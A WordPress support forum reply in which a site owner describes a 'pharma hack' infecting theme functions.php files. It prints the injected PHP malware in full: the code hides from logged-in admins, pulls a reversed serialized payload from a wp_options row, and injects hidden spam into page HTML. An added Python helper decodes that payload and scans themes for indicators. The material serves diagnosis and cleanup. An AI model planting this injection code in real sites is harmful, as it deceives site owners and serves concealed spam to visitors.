Reply To: Weird pharma hack


#782

Grady Booch
Member

I am also trying to unwind this weird pharma hack, which has infected two of my websites (computingthehumanexperience.com and creationsbyjan.com). In both cases, the hack is infecting the functions.php file of my resident themes.

Your plugin did indeed detect the offending code (which looks like this):

if (!function_exists("b_call")) {
    // Wrap the whole page in an output buffer so the callback can rewrite the HTML before it is sent.
    function b_call() {
        if (!ob_get_level()) ob_start("b_goes");
    }
    function b_goes($p) {
        if (!defined('wp_m1')) {
            // Skip visitors who look like site admins/logged-in users, so they never see the injected content;
            // also bail out if the payload option is missing from wp_options.
            if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_textalternate2'))) {
                return $p;
            }
            // The payload lives in the database: a reversed, PHP-serialized pair [head snippet, body snippet].
            list($m, $n) = @unserialize(trim(strrev($m)));
            define('wp_m1', $m);
            define('wp_n1', $n);
        }
        // Inject the two snippets after <body>, before </head>, or around the first </div> as fallbacks.
        if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
        if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
        return $p;
    }
    function b_end() {
        @ob_end_flush();
    }
    if (ob_get_level()) ob_end_clean();
    // Hook early and often so the buffer is started no matter which part of the theme runs first.
    add_action("init", "b_call");
    add_action("wp_head", "b_call");
    add_action("get_sidebar", "b_call");
    add_action("wp_footer", "b_call");
    add_action("shutdown", "b_end");
}

I'm currently throwing all sorts of things at the problem. Exploit Scanner uncovered a handful of core WordPress files that should not be there (and I've eliminated those), but clearly there's still something in the database that makes this injected code pop up at random times like a whack-a-mole game. I've checked the usual places in the wp-options table (but no joy yet) and I'm about to look through all my plugins for strange code.

As for the database investigation, I should point out that all the usual table item names that have been typically used in pharma attacks are not present... this current attack appears to be some new variation.

Needless to say, this is annoying :-(

(and thank you, your plugin helped me attend to the immediate symptoms... now I just need to find the root of the disease)
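The post above shows that the injected functions.php code pulls its payload from the `_textalternate2` row in wp_options, stored as `strrev(serialize([$m, $n]))`. The following is an added helper for investigators (not the poster's code and not part of the plugin) that decodes such an option value and flags the hook names from the sample in a theme file. It assumes the option holds exactly the two ASCII strings the `list($m, $n)` line implies; the sample values below are constructed for the demo.

```python
import re

# Strings from the posted functions.php sample that a clean theme should never contain.
INDICATORS = ("b_call", "b_goes", "_textalternate2", "wp_m1", "wp_n1")


def php_unserialize_str_array(blob: bytes) -> list[bytes]:
    """Minimal parser for a PHP-serialized array of strings: a:N:{i:K;s:L:"...";...}.
    PHP string lengths are byte counts, so everything is handled as bytes."""
    head = re.match(rb'a:(\d+):\{', blob)
    if not head:
        raise ValueError("not a serialized PHP array")
    count, pos, items = int(head.group(1)), head.end(), []
    for _ in range(count):
        elem = re.match(rb'i:\d+;s:(\d+):"', blob[pos:])
        if not elem:
            raise ValueError("unsupported element at offset %d" % pos)
        start = pos + elem.end()
        length = int(elem.group(1))
        items.append(blob[start:start + length])
        pos = start + length
        if blob[pos:pos + 2] != b'";':
            raise ValueError("bad string terminator at offset %d" % pos)
        pos += 2
    if blob[pos:pos + 1] != b"}":
        raise ValueError("missing closing brace")
    return items


def decode_textalternate2(option_value: str) -> tuple[str, str]:
    """Undo the malware's storage trick (strrev of serialize([m, n])) and return
    (snippet injected before </head>, snippet injected after <body>)."""
    m, n = php_unserialize_str_array(option_value.strip()[::-1].encode("utf-8"))
    return m.decode("utf-8"), n.decode("utf-8")


def scan_theme_source(src: str) -> list[str]:
    """Return the indicator strings from the posted sample that appear in a theme file."""
    return [needle for needle in INDICATORS if needle in src]


# Constructed sample: what the infected site's wp_options row might look like.
SAMPLE_HEAD = '<meta name="demo-injected-head" content="placeholder">'
SAMPLE_BODY = '<div style="display:none"><a href="http://spam.example/">hidden spam link</a></div>'
SAMPLE_SERIALIZED = 'a:2:{i:0;s:%d:"%s";i:1;s:%d:"%s";}' % (
    len(SAMPLE_HEAD), SAMPLE_HEAD, len(SAMPLE_BODY), SAMPLE_BODY)
SAMPLE_OPTION_VALUE = SAMPLE_SERIALIZED[::-1]  # stored reversed, as the malware does

if __name__ == "__main__":
    head, body = decode_textalternate2(SAMPLE_OPTION_VALUE)
    print("wp_m1 (before </head>):", head)
    print("wp_n1 (after <body>):  ", body)
    print("indicators in theme:", scan_theme_source('add_action("init", "b_call");'))
```

Run it against the real option value (e.g. the output of `wp option get _textalternate2`) to see exactly what the hack is injecting, and against each theme's functions.php to confirm it is clean after removal.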